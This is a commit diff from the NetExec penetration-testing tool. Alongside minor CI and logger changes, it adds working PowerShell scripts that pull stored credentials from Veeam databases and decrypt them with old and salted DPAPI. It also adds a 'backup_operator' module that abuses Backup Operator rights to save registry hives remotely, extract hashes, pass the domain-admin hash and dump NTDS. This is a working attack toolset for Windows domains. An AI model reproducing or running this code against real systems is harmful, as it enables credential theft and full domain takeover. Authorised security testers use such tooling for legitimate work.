Merge branch 'main' into marshall-get-gpos

Pennyw0rth · Mar 8, 2025 · a3cd824 · a3cd824
2 parents bd4264d + 23f4e63
commit a3cd824
Show file tree

Hide file tree

Showing 27 changed files with 1,138 additions and 344 deletions.
diff --git a/.github/workflows/build-binaries.yml b/.github/workflows/build-binaries.yml
@@ -10,7 +10,7 @@ jobs:
     strategy:
       matrix:
         os: [ubuntu-latest, macOS-latest, windows-latest]
-        python-version: ["3.12"]
+        python-version: ["3.13"]
         #python-version: ["3.8", "3.9", "3.10", "3.11"] # for binary builds we only need one version
     steps:
     - uses: actions/checkout@v4

diff --git a/.github/workflows/build-zipapps.yml b/.github/workflows/build-zipapps.yml
@@ -10,7 +10,7 @@ jobs:
     strategy:
       matrix:
         os: [ubuntu-latest, macOS-latest, windows-latest]
-        python-version: ["3.10", "3.11", "3.12"]
+        python-version: ["3.10", "3.11", "3.12", "3.13"]
     steps:
     - uses: actions/checkout@v4
     - name: NetExec set up python on ${{ matrix.os }}

diff --git a/.github/workflows/lint.yml b/.github/workflows/lint.yml
@@ -19,7 +19,7 @@ jobs:
       - name: Set up Python
         uses: actions/setup-python@v5
         with:
-          python-version: 3.12
+          python-version: 3.13
           cache: poetry
           cache-dependency-path: poetry.lock
       - name: Install dependencies with dev group

diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml
@@ -14,7 +14,7 @@ jobs:
       max-parallel: 5
       matrix:
         os: [ubuntu-latest]
-        python-version: ["3.10", "3.11", "3.12"]
+        python-version: ["3.10", "3.11", "3.12", "3.13"]
     steps:
       - uses: actions/checkout@v4
       - name: Install poetry

diff --git a/nxc/cli.py b/nxc/cli.py
@@ -53,9 +53,9 @@ def gen_cli_args():
     ||   ||    | \ | |   ___  | |_  | ____| __  __   ___    ___
     \\( )//    |  \| |  / _ \ | __| |  _|   \ \/ /  / _ \  / __|
     .=[ ]=.    | |\  | |  __/ | |_  | |___   >  <  |  __/ | (__
-   / /ॱ-ॱ\ \   |_| \_|  \___|  \__| |_____| /_/\_\  \___|  \___|
-   ॱ \   / ॱ
-     ॱ   ॱ
+   / /˙-˙\ \   |_| \_|  \___|  \__| |_____| /_/\_\  \___|  \___|
+   ˙ \   / ˙
+     ˙   ˙
 
     The network execution tool
     Maintained as an open source project by @NeffIsBack, @MJHallenbeck, @_zblurx

diff --git a/nxc/data/veeam_dump_module/veeam_dump_mssql.ps1 b/nxc/data/veeam_dump_module/veeam_dump_mssql.ps1
@@ -1,9 +1,10 @@
 $SqlDatabaseName = "REPLACE_ME_SqlDatabase"
 $SqlServerName = "REPLACE_ME_SqlServer"
 $SqlInstanceName = "REPLACE_ME_SqlInstance"
+$b64Salt = "REPLACE_ME_b64Salt"
 
 #Forming the connection string
-$SQL = "SELECT [user_name] AS 'User',[password] AS 'Password' FROM [$SqlDatabaseName].[dbo].[Credentials] WHERE password <> ''" #Filter empty passwords
+$SQL = "SELECT [user_name] AS 'User', [password] AS 'Password', [description] AS 'Description' FROM [$SqlDatabaseName].[dbo].[Credentials] WHERE password <> ''" #Filter empty passwords
 $auth = "Integrated Security=SSPI;" #Local user
 $connectionString = "Provider=sqloledb; Data Source=$SqlServerName\$SqlInstanceName; Initial Catalog=$SqlDatabaseName; $auth;"
 $connection = New-Object System.Data.OleDb.OleDbConnection $connectionString
@@ -22,19 +23,46 @@ catch {
 	exit -1
 }
 
-$rows=($dataset.Tables | Select-Object -Expand Rows)
-if ($rows.count -eq 0) {
+$output=($dataset.Tables | Select-Object -Expand Rows)
+if ($output.count -eq 0) {
 	Write-Host "No passwords found!"
 	exit
 }
 
 Add-Type -assembly System.Security
-#Decrypting passwords using DPAPI
-$rows | ForEach-Object -Process {
-	$EnryptedPWD = [Convert]::FromBase64String($_.password)
-	$ClearPWD = [System.Security.Cryptography.ProtectedData]::Unprotect( $EnryptedPWD, $null, [System.Security.Cryptography.DataProtectionScope]::LocalMachine )
+# Decrypting passwords using DPAPI
+$output | ForEach-Object -Process {
+	$EncryptedPWD = [Convert]::FromBase64String($_.password)
 	$enc = [system.text.encoding]::Default
-	$_.password = $enc.GetString($ClearPWD) -replace '\s', 'WHITESPACE_ERROR'
+
+	try {
+		# Decrypt password with DPAPI (old Veeam versions)
+		$raw = [System.Security.Cryptography.ProtectedData]::Unprotect( $EncryptedPWD, $null, [System.Security.Cryptography.DataProtectionScope]::LocalMachine )
+		$pw_string = $enc.GetString($raw) -replace '\s', 'WHITESPACE_ERROR'
+	} catch {
+		try{
+			# Decrypt password with salted DPAPI (new Veeam versions)
+			$salt = [System.Convert]::FromBase64String($b64Salt)
+			$hex = New-Object -TypeName System.Text.StringBuilder -ArgumentList ($EncryptedPWD.Length * 2)
+			foreach ($byte in $EncryptedPWD)
+			{
+				$hex.AppendFormat("{0:x2}", $byte) > $null
+			}
+			$hex = $hex.ToString().Substring(74,$hex.Length-74)
+			$EncryptedPWD = New-Object -TypeName byte[] -ArgumentList ($hex.Length / 2)
+			for ($i = 0; $i -lt $hex.Length; $i += 2)
+			{
+				$EncryptedPWD[$i / 2] = [System.Convert]::ToByte($hex.Substring($i, 2), 16)
+			}
+			$raw = [System.Security.Cryptography.ProtectedData]::Unprotect($EncryptedPWD, $salt, [System.Security.Cryptography.DataProtectionScope]::LocalMachine)
+			$pw_string = $enc.GetString($raw) -replace '\s', 'WHITESPACE_ERROR'
+		}catch {
+			$pw_string = "COULD_NOT_DECRYPT"
+		}
+	}
+	$_.user = $_.user -replace '\s', 'WHITESPACE_ERROR'
+	$_.password = $pw_string
+	$_.description = $_.description -replace '\s', 'WHITESPACE_ERROR'
 }
 
-Write-Output $rows | Format-Table -HideTableHeaders | Out-String
+Write-Output $output | Format-Table -HideTableHeaders | Out-String -Width 10000
diff --git a/nxc/data/veeam_dump_module/veeam_dump_postgresql.ps1 b/nxc/data/veeam_dump_module/veeam_dump_postgresql.ps1
@@ -1,22 +1,50 @@
 $PostgreSqlExec = "REPLACE_ME_PostgreSqlExec"
 $PostgresUserForWindowsAuth = "REPLACE_ME_PostgresUserForWindowsAuth"
 $SqlDatabaseName = "REPLACE_ME_SqlDatabaseName"
+$b64Salt = "REPLACE_ME_b64Salt"
 
-$SQLStatement = "SELECT user_name AS User,password AS Password FROM credentials WHERE password != '';"
+$SQLStatement = "SELECT user_name AS User, password AS Password, description AS Description  FROM credentials WHERE password != '';"
 $output = . $PostgreSqlExec -U $PostgresUserForWindowsAuth -w -d $SqlDatabaseName -c $SQLStatement --csv | ConvertFrom-Csv
 
 if ($output.count -eq 0) {
 	Write-Host "No passwords found!"
 	exit
 }
 
+# Decrypting passwords using DPAPI
 Add-Type -assembly System.Security
-#Decrypting passwords using DPAPI
 $output | ForEach-Object -Process {
-    $EnryptedPWD = [Convert]::FromBase64String($_.password)
-	$ClearPWD = [System.Security.Cryptography.ProtectedData]::Unprotect( $EnryptedPWD, $null, [System.Security.Cryptography.DataProtectionScope]::LocalMachine )
+	$EncryptedPWD = [Convert]::FromBase64String($_.password)
 	$enc = [system.text.encoding]::Default
-	$_.password = $enc.GetString($ClearPWD) -replace '\s', 'WHITESPACE_ERROR'
+
+	try {
+		# Decrypt password with DPAPI (old Veeam versions)
+		$raw = [System.Security.Cryptography.ProtectedData]::Unprotect( $EncryptedPWD, $null, [System.Security.Cryptography.DataProtectionScope]::LocalMachine )
+		$pw_string = $enc.GetString($raw) -replace '\s', 'WHITESPACE_ERROR'
+	} catch {
+		try{
+			# Decrypt password with salted DPAPI (new Veeam versions)
+			$salt = [System.Convert]::FromBase64String($b64Salt)
+			$hex = New-Object -TypeName System.Text.StringBuilder -ArgumentList ($EncryptedPWD.Length * 2)
+			foreach ($byte in $EncryptedPWD)
+			{
+				$hex.AppendFormat("{0:x2}", $byte) > $null
+			}
+			$hex = $hex.ToString().Substring(74,$hex.Length-74)
+			$EncryptedPWD = New-Object -TypeName byte[] -ArgumentList ($hex.Length / 2)
+			for ($i = 0; $i -lt $hex.Length; $i += 2)
+			{
+				$EncryptedPWD[$i / 2] = [System.Convert]::ToByte($hex.Substring($i, 2), 16)
+			}
+			$raw = [System.Security.Cryptography.ProtectedData]::Unprotect($EncryptedPWD, $salt, [System.Security.Cryptography.DataProtectionScope]::LocalMachine)
+			$pw_string = $enc.GetString($raw) -replace '\s', 'WHITESPACE_ERROR'
+		}catch {
+			$pw_string = "COULD_NOT_DECRYPT"
+		}
+	}
+	$_.user = $_.user -replace '\s', 'WHITESPACE_ERROR'
+	$_.password = $pw_string
+	$_.description = $_.description -replace '\s', 'WHITESPACE_ERROR'
 }
 
-Write-Output $output | Format-Table -HideTableHeaders | Out-String
+Write-Output $output | Format-Table -HideTableHeaders | Out-String -Width 10000
diff --git a/nxc/logger.py b/nxc/logger.py
@@ -80,7 +80,7 @@ def wrapper(self, msg, *args, **kwargs):
 
 
 class NXCAdapter(logging.LoggerAdapter):
-    def __init__(self, extra=None):
+    def __init__(self, extra=None, merge_extra=False):
         logging.basicConfig(
             format="%(message)s",
             datefmt="[%X]",
@@ -93,6 +93,7 @@ def __init__(self, extra=None):
         )
         self.logger = logging.getLogger("nxc")
         self.extra = extra
+        self.merge_extra = merge_extra
         self.output_file = None
 
         logging.getLogger("impacket").disabled = True

diff --git a/nxc/modules/backup_operator.py b/nxc/modules/backup_operator.py
@@ -0,0 +1,143 @@
+import time
+import os
+import datetime
+
+from impacket.examples.secretsdump import SAMHashes, LSASecrets, LocalOperations
+from impacket.smbconnection import SessionError
+from impacket.dcerpc.v5 import transport, rrp
+from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_GSS_NEGOTIATE
+
+from nxc.paths import NXC_PATH
+
+class NXCModule:
+    name = "backup_operator"
+    description = "Exploit user in backup operator group to dump NTDS @mpgn_x64"
+    supported_protocols = ["smb"]
+    opsec_safe = True
+    multiple_hosts = True
+
+    def __init__(self, context=None, module_options=None):
+        self.context = context
+        self.module_options = module_options
+        self.domain_admin = None
+        self.domain_admin_hash = None
+        self.deleted_files = True  # flag to check if SAM/SYSTEM/SECURITY files were deleted
+
+    def options(self, context, module_options):
+        """NO OPTIONS"""
+
+    def on_login(self, context, connection):
+        connection.args.share = "SYSVOL"
+        # enable remote registry
+        context.log.display("Triggering RemoteRegistry to start through named pipe...")
+        self.trigger_winreg(connection.conn, context)
+        rpc = transport.DCERPCTransportFactory(r"ncacn_np:445[\pipe\winreg]")
+        rpc.set_smb_connection(connection.conn)
+        if connection.kerberos:
+            rpc.set_kerberos(connection.kerberos, kdcHost=connection.kdcHost)
+        dce = rpc.get_dce_rpc()
+        if connection.kerberos:
+            dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
+        dce.connect()
+        dce.bind(rrp.MSRPC_UUID_RRP)
+
+        try:
+            for hive in ["HKLM\\SAM", "HKLM\\SYSTEM", "HKLM\\SECURITY"]:
+                hRootKey, subKey = self._strip_root_key(dce, hive)
+                outputFileName = f"\\\\{connection.host}\\SYSVOL\\{subKey}"
+                context.log.debug(f"Dumping {hive}, be patient it can take a while for large hives (e.g. HKLM\\SYSTEM)")
+                try:
+                    ans2 = rrp.hBaseRegOpenKey(dce, hRootKey, subKey, dwOptions=rrp.REG_OPTION_BACKUP_RESTORE | rrp.REG_OPTION_OPEN_LINK, samDesired=rrp.KEY_READ)
+                    rrp.hBaseRegSaveKey(dce, ans2["phkResult"], outputFileName)
+                    context.log.highlight(f"Saved {hive} to {outputFileName}")
+                except Exception as e:
+                    context.log.fail(f"Couldn't save {hive}: {e} on path {outputFileName}")
+                    return
+        except (Exception, KeyboardInterrupt) as e:
+            context.log.fail(str(e))
+        finally:
+            dce.disconnect()
+
+        # copy remote file to local
+        log_path = os.path.expanduser(f"{NXC_PATH}/logs/{connection.hostname}_{connection.host}_{datetime.datetime.now().strftime('%Y-%m-%d_%H%M%S')}.".replace(":", "-"))
+        for hive in ["SAM", "SECURITY", "SYSTEM"]:
+            connection.get_file_single(hive, log_path + hive)
+
+        # read local file
+        try:
+            def parse_sam(secret):
+                context.log.highlight(secret)
+                if not self.domain_admin:
+                    first_line = secret.strip().splitlines()[0]
+                    fields = first_line.split(":")
+                    self.domain_admin = fields[0]
+                    self.domain_admin_hash = fields[3]
+
+            local_operations = LocalOperations(log_path + "SYSTEM")
+            boot_key = local_operations.getBootKey()
+            sam_hashes = SAMHashes(log_path + "SAM", boot_key, isRemote=False, perSecretCallback=lambda secret: parse_sam(secret))
+            sam_hashes.dump()
+            sam_hashes.finish()
+
+            LSA = LSASecrets(log_path + "SECURITY", boot_key, None, isRemote=False, perSecretCallback=lambda secret_type, secret: context.log.highlight(secret))
+            LSA.dumpCachedHashes()
+            LSA.dumpSecrets()
+        except Exception as e:
+            context.log.fail(f"Fail to dump the sam and lsa: {e!s}")
+
+        if self.domain_admin:
+            connection.conn.logoff()
+            connection.create_conn_obj()
+            if connection.hash_login(connection.domain, self.domain_admin, self.domain_admin_hash):
+                try:
+                    context.log.display("Dumping NTDS...")
+                    connection.ntds()
+                except Exception as e:
+                    context.log.fail(f"Fail to dump the NTDS: {e!s}")
+
+                context.log.display(f"Cleaning dump with user {self.domain_admin} and hash {self.domain_admin_hash} on domain {connection.domain}")
+                connection.execute("del C:\\Windows\\sysvol\\sysvol\\SECURITY && del C:\\Windows\\sysvol\\sysvol\\SAM && del C:\\Windows\\sysvol\\sysvol\\SYSTEM")
+                for hive in ["SAM", "SECURITY", "SYSTEM"]:
+                    try:
+                        out = connection.conn.listPath("SYSVOL", hive)
+                        if out:
+                            self.deleted_files = False
+                            context.log.fail(f"Fail to remove the file {hive}, path: C:\\Windows\\sysvol\\sysvol\\{hive}")
+                    except SessionError as e:
+                        context.log.debug(f"File {hive} successfully removed: {e}")
+            else:
+                self.deleted_files = False
+        else:
+            self.deleted_files = False
+
+        if not self.deleted_files:
+            context.log.display("Use the domain admin account to clean the file on the remote host")
+            context.log.display("netexec smb dc_ip -u user -p pass -x \"del C:\\Windows\\sysvol\\sysvol\\SECURITY && del C:\\Windows\\sysvol\\sysvol\\SAM && del C:\\Windows\\sysvol\\sysvol\\SYSTEM\"")  # noqa: Q003
+        else:
+            context.log.display("Successfully deleted dump files !")
+
+    def trigger_winreg(self, connection, context):
+        # Original idea from https://twitter.com/splinter_code/status/1715876413474025704
+        # Basically triggers the RemoteRegistry to start without admin privs
+        tid = connection.connectTree("IPC$")
+        try:
+            connection.openFile(
+                tid,
+                r"\winreg",
+                0x12019F,
+                creationOption=0x40,
+                fileAttributes=0x80,
+            )
+        except SessionError as e:
+            # STATUS_PIPE_NOT_AVAILABLE error is expected
+            context.log.debug(str(e))
+        # Give remote registry time to start
+        time.sleep(1)
+
+    def _strip_root_key(self, dce, key_name):
+        # Let's strip the root key
+        key_name.split("\\")[0]
+        sub_key = "\\".join(key_name.split("\\")[1:])
+        ans = rrp.hOpenLocalMachine(dce)
+        h_root_key = ans["phKey"]
+        return h_root_key, sub_key